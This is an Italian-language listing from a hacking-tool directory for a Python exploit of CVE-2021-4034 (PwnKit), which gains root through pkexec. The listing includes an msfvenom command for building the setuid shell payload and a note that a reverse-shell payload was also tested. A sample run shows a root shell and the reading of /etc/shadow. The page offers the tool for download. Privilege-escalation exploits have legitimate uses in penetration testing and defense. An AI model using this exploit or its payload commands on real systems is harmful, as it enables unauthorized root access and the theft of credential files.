Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-4034 — Exploit Python per CVE-2021-4034 (PwnKit) che eleva i privilegi a root tramite pkexec, generando una shell root con payload msfvenom. | Kitploit
Strumenti/GitHubGitHub/joeammond/cve-2021-4034
Escalation di PrivilegiGenerazione di PayloadExploitPenetration TestingBinary Exploitation
GitHubjoeammond/cve-2021-4034

CVE-2021-4034

Exploit Python per CVE-2021-4034 (PwnKit) che eleva i privilegi a root tramite pkexec, generando una shell root con payload msfvenom.

Vedi Repository
1803964 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Python3 code per sfruttare CVE-2021-4034 (PWNKIT). Questo è stato un esercizio per "posso farlo funzionare in Python?", e non è pensato come un exploit robusto. Funziona per me, ci sono probabilmente bug.

Il payload predefinito avvia una shell come root, generato da msfvenom:

root@kitploit:~
msfvenom -p linux/x64/exec -f elf-so PrependSetuid=true | base64

Ho testato anche linux/x64/shell_reverse_tcp. Assicurati di includere l'argomento PrependSetuid=true a msfvenom, altrimenti otterrai solo una shell come utente e non come root.

Il codice è preso da blasty, l'originale è disponibile qui

root@kitploit:~
$ python CVE-2021-4034.py
[+] Creazione della libreria condivisa per il codice dell'exploit.
[+] Chiamata a execve()
# id
uid=0(root) gid=1000(jra) groups=1000(jra),4(adm),27(sudo),119(lpadmin),998(lxd)
# whoami
root
# head /etc/shadow
root:*:18709:0:99999:7:::
daemon:*:18709:0:99999:7:::
bin:*:18709:0:99999:7:::
sys:*:18709:0:99999:7:::
sync:*:18709:0:99999:7:::
games:*:18709:0:99999:7:::
man:*:18709:0:99999:7:::
lp:*:18709:0:99999:7:::
mail:*:18709:0:99999:7:::
news:*:18709:0:99999:7:::
#
Scarica lo strumento